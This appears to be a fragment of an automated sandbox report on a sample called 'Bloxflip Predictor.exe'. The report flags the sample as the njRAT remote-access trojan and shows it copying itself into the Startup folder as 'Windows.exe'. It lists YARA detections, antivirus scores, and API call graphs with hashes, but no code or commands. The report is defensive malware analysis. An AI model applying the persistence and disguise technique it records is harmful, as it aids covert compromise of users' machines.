                                          File size:19'456 bytes
                                          MD5 hash:0E938DD280E83B1596EC6AA48729C2B0
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:8
                                          Start time:06:31:49
                                          Start date:13/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:9
                                          Start time:06:31:49
                                          Start date:13/12/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:10
                                          Start time:06:31:54
                                          Start date:13/12/2024
                                          Path:C:\Windows\Bloxflip Predictor.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\Bloxflip Predictor.exe"
                                          Imagebase:0xfb0000
                                          File size:28'160 bytes
                                          MD5 hash:7BF897CA59B77AD3069C07149C35F97E
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000A.00000002.2394132880.0000000003401000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:true

                                          Target ID:12
                                          Start time:06:32:43
                                          Start date:13/12/2024
                                          Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
                                          Imagebase:0xe90000
                                          File size:28'160 bytes
                                          MD5 hash:7BF897CA59B77AD3069C07149C35F97E
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 0000000C.00000002.2880439130.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: Joe Security
                                          • Rule: Windows_Trojan_Njrat_30f3c220, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: unknown
                                          • Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: Florian Roth
                                          • Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: JPCERT/CC Incident Response Group
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          • Rule: INDICATOR_SUSPICIOUS_EXE_attrib, Description: Detects executables using attrib with suspicious attributes attributes, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, Author: ditekSHen
                                          Antivirus matches:
                                          • Detection: 100%, Avira
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 84%, ReversingLabs
                                          Reputation:low
                                          Has exited:true


                                            Execution Graph

                                            Execution Coverage:28.4%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:60
                                            Total number of Limit Nodes:3


                                            Control-flow Graph

                                            APIs
                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00BFB0D1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0

                                            Control-flow Graph

                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 00BFAED9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0

                                            Control-flow Graph

                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFA5B8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0

                                            Control-flow Graph

                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 00BFB7A1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 6d59b1aeea19a54ca05d2f4150f325261d63612c641091e8addb00b0a604c3d4
                                            • Instruction ID: 05e20eb54e9565da90ed813155e62cb0fc7041ad7adbf89cfba1d4cf439d6239
                                            • Opcode Fuzzy Hash: 6d59b1aeea19a54ca05d2f4150f325261d63612c641091e8addb00b0a604c3d4
                                            • Instruction Fuzzy Hash: 72318072405344AFE7229B61CC84FA6BFFCEF55314F08849AE9858B652D325E94CCB71

                                            Control-flow Graph

                                            control_flow_graph 60 bfab81-bfabef 63 bfabf4-bfabfd 60->63 64 bfabf1 60->64 65 bfabff 63->65 66 bfac02-bfac08 63->66 64->63 65->66 67 bfac0d-bfac24 66->67 68 bfac0a 66->68 70 bfac5b-bfac60 67->70 71 bfac26-bfac39 RegQueryValueExW 67->71 68->67 70->71 72 bfac3b-bfac58 71->72 73 bfac62-bfac67 71->73 73->72
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFAC2C
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: b6fb0b2963dbb2385efe73f60ab5f64eec5f641d20326012dd0a22b2019ed87c
                                            • Instruction ID: 9e9aa880891672f13678fa52288609038e5159423cf88e589b63d13dfddf8963
                                            • Opcode Fuzzy Hash: b6fb0b2963dbb2385efe73f60ab5f64eec5f641d20326012dd0a22b2019ed87c
                                            • Instruction Fuzzy Hash: B93180B5505744AFD722CB15CC44FA2BFF8EF15710F0884DAE949CB252D324E908CB62

                                            Control-flow Graph

                                            control_flow_graph 77 bfb128-bfb1b5 81 bfb1ea-bfb1ef 77->81 82 bfb1b7-bfb1ca GetFileType 77->82 81->82 83 bfb1cc-bfb1e9 82->83 84 bfb1f1-bfb1f6 82->84 84->83
                                            APIs
                                            • GetFileType.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFB1BD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID:
                                            • API String ID: 3081899298-0
                                            • Opcode ID: 75f95cd6524890faf0f753e6e4923d54aa964d014002d4fdaa8391af02469016
                                            • Instruction ID: 95098adc50161a8662f7ae8687e8f6c38b960b3aa7fd3906c0f36ce488bc59e2
                                            • Opcode Fuzzy Hash: 75f95cd6524890faf0f753e6e4923d54aa964d014002d4fdaa8391af02469016
                                            • Instruction Fuzzy Hash: 7A2107B54093806FE7138B25DC41BA2BFBCEF57724F0881D6E9848B293D264A909C771

                                            Control-flow Graph

                                            control_flow_graph 88 bfac82-bface3 91 bface8-bfacf4 88->91 92 bface5 88->92 93 bfacf9-bfad10 91->93 94 bfacf6 91->94 92->91 96 bfad47-bfad4c 93->96 97 bfad12-bfad25 RegSetValueExW 93->97 94->93 96->97 98 bfad4e-bfad53 97->98 99 bfad27-bfad44 97->99 98->99
                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFAD18
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 64a208b2bce5415f5d2105df97362646de43db324be041f56887c769bc78889a
                                            • Instruction ID: f24904b61a240128010e2b554001c1327abdd6b0626e018f88c1aa01b76aebae
                                            • Opcode Fuzzy Hash: 64a208b2bce5415f5d2105df97362646de43db324be041f56887c769bc78889a
                                            • Instruction Fuzzy Hash: 062192B65053846FD7228B11CC44FA7BFFCEF55714F08849AE945CB652D264E848C771

                                            Control-flow Graph

                                            control_flow_graph 103 bfb052-bfb0aa 106 bfb0af-bfb0bb 103->106 107 bfb0ac 103->107 108 bfb0bd 106->108 109 bfb0c0-bfb0c9 106->109 107->106 108->109 110 bfb0cb-bfb0d3 CreateFileW 109->110 111 bfb11a-bfb11f 109->111 113 bfb0d9-bfb0ef 110->113 111->110 114 bfb121-bfb126 113->114 115 bfb0f1-bfb117 113->115 114->115
                                            APIs
                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00BFB0D1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: b9cf0fc88de7e7460c3131ccb31034722624d7bf4d12328e9bdd225e1b464905
                                            • Instruction ID: c6f9d4ff49db2d1a2adfd738cd8410d6580346494cdfd1ecfa013559b05082fb
                                            • Opcode Fuzzy Hash: b9cf0fc88de7e7460c3131ccb31034722624d7bf4d12328e9bdd225e1b464905
                                            • Instruction Fuzzy Hash: 30219271500204AFEB21DF65DD85F66FBE8EF18314F0488AAEA498B751D775E408CB71

                                            Control-flow Graph

                                            control_flow_graph 118 bfb722-bfb77d 121 bfb77f 118->121 122 bfb782-bfb799 118->122 121->122 124 bfb7db-bfb7e0 122->124 125 bfb79b-bfb7ae RegOpenKeyExW 122->125 124->125 126 bfb7e2-bfb7e7 125->126 127 bfb7b0-bfb7d8 125->127 126->127
                                            APIs
                                            • RegOpenKeyExW.KERNELBASE(?,00000E24), ref: 00BFB7A1
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Open
                                            • String ID:
                                            • API String ID: 71445658-0
                                            • Opcode ID: 777d8a23224ca296a744ea200245869d8599bd01ce639b617f87d42ded9c6bdd
                                            • Instruction ID: 9bd715d43c38a00e1dc9ca7809f022461898bf03e4513eb2f1e022ecc2967b76
                                            • Opcode Fuzzy Hash: 777d8a23224ca296a744ea200245869d8599bd01ce639b617f87d42ded9c6bdd
                                            • Instruction Fuzzy Hash: A621A472500208AFE7219F55CC84FABF7ECEF68714F14845AEA458B651D774E90C8BB1

                                            Control-flow Graph

                                            control_flow_graph 132 bfae66-bfaeb5 135 bfaeba-bfaec3 132->135 136 bfaeb7 132->136 137 bfaec8-bfaed1 135->137 138 bfaec5 135->138 136->135 139 bfaed3-bfaedb CreateMutexW 137->139 140 bfaf22-bfaf27 137->140 138->137 141 bfaee1-bfaef7 139->141 140->139 143 bfaf29-bfaf2e 141->143 144 bfaef9-bfaf1f 141->144 143->144
                                            APIs
                                            • CreateMutexW.KERNELBASE(?,?), ref: 00BFAED9
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CreateMutex
                                            • String ID:
                                            • API String ID: 1964310414-0
                                            • Opcode ID: a450bd4b990b1c646ad3e89675c4bebaf3a9bd88738f0424697725bce0c54916
                                            • Instruction ID: ab58948a6a1c7d09e9f6274ee729509445dd61715f8b8f4d37b93633c441d41a
                                            • Opcode Fuzzy Hash: a450bd4b990b1c646ad3e89675c4bebaf3a9bd88738f0424697725bce0c54916
                                            • Instruction Fuzzy Hash: A62195B15052049FEB24DF25DD85BA6FBE8EF14314F148499EA48CF741D775E808CA72

                                            Control-flow Graph

                                            control_flow_graph 147 bfb2da-bfb351 151 bfb395-bfb39a 147->151 152 bfb353-bfb373 WriteFile 147->152 151->152 155 bfb39c-bfb3a1 152->155 156 bfb375-bfb392 152->156 155->156
                                            APIs
                                            • WriteFile.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFB359
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 24cf1378cafdb2e2716f2229b83a07c7c94854414186a036ac21699edd812cc3
                                            • Instruction ID: 64a7001835598319e82dee2609ede38bd367a828bb792a15005eefa9d886472e
                                            • Opcode Fuzzy Hash: 24cf1378cafdb2e2716f2229b83a07c7c94854414186a036ac21699edd812cc3
                                            • Instruction Fuzzy Hash: AD219F71409384AFDB22CF51DC44FA7BFB8EF55724F08849AEA498B552C335A508CBB6

                                            Control-flow Graph

                                            control_flow_graph 171 bfabb2-bfabef 173 bfabf4-bfabfd 171->173 174 bfabf1 171->174 175 bfabff 173->175 176 bfac02-bfac08 173->176 174->173 175->176 177 bfac0d-bfac24 176->177 178 bfac0a 176->178 180 bfac5b-bfac60 177->180 181 bfac26-bfac39 RegQueryValueExW 177->181 178->177 180->181 182 bfac3b-bfac58 181->182 183 bfac62-bfac67 181->183 183->182
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFAC2C
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: QueryValue
                                            • String ID:
                                            • API String ID: 3660427363-0
                                            • Opcode ID: 00bcd107aa87f52449fbb1bed63e785a42a8ece2c7dc3c5b259856809d316bba
                                            • Instruction ID: 34242952e1a0ae32c5acd7c5b2ae26cdb2278a8bb2b48e058a40f29310e67b96
                                            • Opcode Fuzzy Hash: 00bcd107aa87f52449fbb1bed63e785a42a8ece2c7dc3c5b259856809d316bba
                                            • Instruction Fuzzy Hash: B42193B55002049FE721CF15CC84FA6B7ECEF24714F04C49AEA49CB651D764E908CA72

                                            Control-flow Graph

                                            control_flow_graph 159 bfa54e-bfa5b0 163 bfa5fd-bfa602 159->163 164 bfa5b2-bfa5ba GetTokenInformation 159->164 163->164 165 bfa5c0-bfa5d2 164->165 167 bfa604-bfa609 165->167 168 bfa5d4-bfa5fa 165->168 167->168
                                            APIs
                                            • GetTokenInformation.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFA5B8
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: InformationToken
                                            • String ID:
                                            • API String ID: 4114910276-0
                                            • Opcode ID: 4534b9159d1e8775e1ab3a933fb99f94535c7f7d0ce460f02a931ca7f74dc3d6
                                            • Instruction ID: d3cb2858b130cab1f5eff38656b85d5cf30b49c21d80a2ee5552162ea6c1ac73
                                            • Opcode Fuzzy Hash: 4534b9159d1e8775e1ab3a933fb99f94535c7f7d0ce460f02a931ca7f74dc3d6
                                            • Instruction Fuzzy Hash: 8A11A5B1500204AFEB21CF55DC44FAAB7ECEF24714F04845AE949CB651D774E5488BB1

                                            Control-flow Graph

                                            control_flow_graph 187 bfaca6-bface3 189 bface8-bfacf4 187->189 190 bface5 187->190 191 bfacf9-bfad10 189->191 192 bfacf6 189->192 190->189 194 bfad47-bfad4c 191->194 195 bfad12-bfad25 RegSetValueExW 191->195 192->191 194->195 196 bfad4e-bfad53 195->196 197 bfad27-bfad44 195->197 196->197
                                            APIs
                                            • RegSetValueExW.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFAD18
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 3bd774d3a2deee45c92adb0c26f157688974793649342b114ae4d0371cc3ff5c
                                            • Instruction ID: 255ad005b67ddeee9323f2907247ba592e4f8ec3af32297bee63a43de7cbdbdc
                                            • Opcode Fuzzy Hash: 3bd774d3a2deee45c92adb0c26f157688974793649342b114ae4d0371cc3ff5c
                                            • Instruction Fuzzy Hash: 851184B5500204AFEB318E15CC41FA6BBECEF24714F1484AAEE498BA51D775E808CA72

                                            Control-flow Graph

                                            control_flow_graph 201 bfb2fa-bfb351 204 bfb395-bfb39a 201->204 205 bfb353-bfb35b WriteFile 201->205 204->205 207 bfb361-bfb373 205->207 208 bfb39c-bfb3a1 207->208 209 bfb375-bfb392 207->209 208->209
                                            APIs
                                            • WriteFile.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFB359
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileWrite
                                            • String ID:
                                            • API String ID: 3934441357-0
                                            • Opcode ID: 06fd925d677667153cf710d1fa17a8da6f2a41ac5a3b1e9bd707337752e34555
                                            • Instruction ID: 8112c6b255509c2d3514abca5f7431db8c5f29bd5089e78ca4ab6d1267a59d10
                                            • Opcode Fuzzy Hash: 06fd925d677667153cf710d1fa17a8da6f2a41ac5a3b1e9bd707337752e34555
                                            • Instruction Fuzzy Hash: 0B11C471500304AFEB21CF51DC44FA6FBE8EF24724F14849AEA498B651C775E408CBB5
                                            APIs
                                            • ShellExecuteExW.SHELL32(?), ref: 00BFB4C0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID:
                                            • API String ID: 587946157-0
                                            • Opcode ID: 2e63c31e451f7db3a248feb6c4588f5adb3e584475eb6424d999c07512126d77
                                            • Instruction ID: ed5b05bc4fa905feb6eb3237c67d05def30ec53be5dae15cc71fd8c51c185eef
                                            • Opcode Fuzzy Hash: 2e63c31e451f7db3a248feb6c4588f5adb3e584475eb6424d999c07512126d77
                                            • Instruction Fuzzy Hash: 0F115E715093849FDB12CF25DD94B52BFE8DF46320F0884EAED49CB252D264E808CB62
                                            APIs
                                            • GetFileType.KERNELBASE(?,00000E24,C53FB55A,00000000,00000000,00000000,00000000), ref: 00BFB1BD
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID:
                                            • API String ID: 3081899298-0
                                            • Opcode ID: a8b49606302ed10b85b55d439b89bb6ac0bfa8184057d28550aedb7aac86546b
                                            • Instruction ID: b25c34f97a0bd1532eec190f46220ab92aa6dd9966f2686731894233f9d883d2
                                            • Opcode Fuzzy Hash: a8b49606302ed10b85b55d439b89bb6ac0bfa8184057d28550aedb7aac86546b
                                            • Instruction Fuzzy Hash: A701C071510204AEEB218B05DC85FA6B7E8DF25724F14C096EE099B741D774EA0CCAB1
                                            APIs
                                            • WaitForInputIdle.USER32(?,?), ref: 00BFB6AF
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: IdleInputWait
                                            • String ID:
                                            • API String ID: 2200289081-0
                                            • Opcode ID: 0d276dabcc7b0128f2ea60e8cc1c6b413e3aee734a1355da25908a8128474e65
                                            • Instruction ID: 0e5f7738e8de84dc49d6ee7d797b1e45572658b93a796d1c33ec88605206a532
                                            • Opcode Fuzzy Hash: 0d276dabcc7b0128f2ea60e8cc1c6b413e3aee734a1355da25908a8128474e65
                                            • Instruction Fuzzy Hash: 9A117371509384AFDB11CF55DD84B52FFE4EF46320F0984DADD458F262D275A808CB61
                                            APIs
                                            • SetErrorMode.KERNELBASE(?), ref: 00BFAB50
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: eff56a2c2142db1134403a3ec824cc6ebb1525b113ab21d5a0d6177a46e9e968
                                            • Instruction ID: c4ecdb152753baae03b41b1db9a68a087e744a7e3db40eecd9df6dfc48a4774b
                                            • Opcode Fuzzy Hash: eff56a2c2142db1134403a3ec824cc6ebb1525b113ab21d5a0d6177a46e9e968
                                            • Instruction Fuzzy Hash: C61165B1409384AFDB228B15DC44B62BFB4DF46725F0880DAED898B253D275A908CB72
                                            APIs
                                            • ShellExecuteExW.SHELL32(?), ref: 00BFB4C0
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ExecuteShell
                                            • String ID:
                                            • API String ID: 587946157-0
                                            • Opcode ID: fb15439663d6b2078b956131029cec93abd34fea3c2a692f9421972af0d8b323
                                            • Instruction ID: eb955a27e65feead45dbef44ad553232a17b19c1f34170ac7bc277587c6fb7d7
                                            • Opcode Fuzzy Hash: fb15439663d6b2078b956131029cec93abd34fea3c2a692f9421972af0d8b323
                                            • Instruction Fuzzy Hash: 57016D716002488FDB10CF2AD985B66BBE8DF15320F08C4AADE09CB742D778E8088A61
                                            APIs
                                            • WaitForInputIdle.USER32(?,?), ref: 00BFB6AF
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: IdleInputWait
                                            • String ID:
                                            • API String ID: 2200289081-0
                                            • Opcode ID: 96c0dc8ade71d11c49199b8f6c704a73dce17c8e88ba74e953d5a17b6d91f8d0
                                            • Instruction ID: 2dbe8236c3d722f3cc9e092bb8039061c02765e6a98c1d6215b8d36c15cb5a6e
                                            • Opcode Fuzzy Hash: 96c0dc8ade71d11c49199b8f6c704a73dce17c8e88ba74e953d5a17b6d91f8d0
                                            • Instruction Fuzzy Hash: FF018F71904248AFDB20CF15D984B65FBE4EF15325F18C4EADE498F252D375E408CBA2
                                            APIs
                                            • SetErrorMode.KERNELBASE(?), ref: 00BFAB50
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: ErrorMode
                                            • String ID:
                                            • API String ID: 2340568224-0
                                            • Opcode ID: 3ea0a523769d836003748d25fc27eb5f772505b02269cc62c2e28d99233a90b1
                                            • Instruction ID: 55d1cafcb908de09b636454ba24546d985fb0ae14acbda6721e3eddfed89a467
                                            • Opcode Fuzzy Hash: 3ea0a523769d836003748d25fc27eb5f772505b02269cc62c2e28d99233a90b1
                                            • Instruction Fuzzy Hash: FCF0A9B59042489FDB208F05D885B61FBE4EF15325F18C0DADE0D4B752D2B9E808CAA2
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 00BFA290
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: b9f7d9e87728e7ed57d4256ce2ba887fe9151bd6fbf6dd6f625b1486ec5dc40e
                                            • Instruction ID: 7395895169241bb683ce2b45526e1c62b5dcdafbb9ebbc7548f07f2f3f9089d4
                                            • Opcode Fuzzy Hash: b9f7d9e87728e7ed57d4256ce2ba887fe9151bd6fbf6dd6f625b1486ec5dc40e
                                            • Instruction Fuzzy Hash: 5411A7B15093849FDB128B25DC94B52BFB4DF46320F0884DBED498F652D275A808CB62
                                            APIs
                                            • CloseHandle.KERNELBASE(?), ref: 00BFA290
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.2143895996.0000000000BFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BFA000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_bfa000_Bloxflip Predictor.jbxd
                                            Similarity
                                            • API ID: CloseHandle
                                            • String ID:
                                            • API String ID: 2962429428-0
                                            • Opcode ID: f4a1934a2d6865f3dd656a935f55f1408185c0cf690027e89a1603aea0998feb
                                            • Instruction ID: ad851fbaad80aefc685c42a4b2c2b9514f3f480bafbe1e182a952325ae7eab6b
                                            • Opcode Fuzzy Hash: f4a1934a2d6865f3dd656a935f55f1408185c0cf690027e89a1603aea0998feb
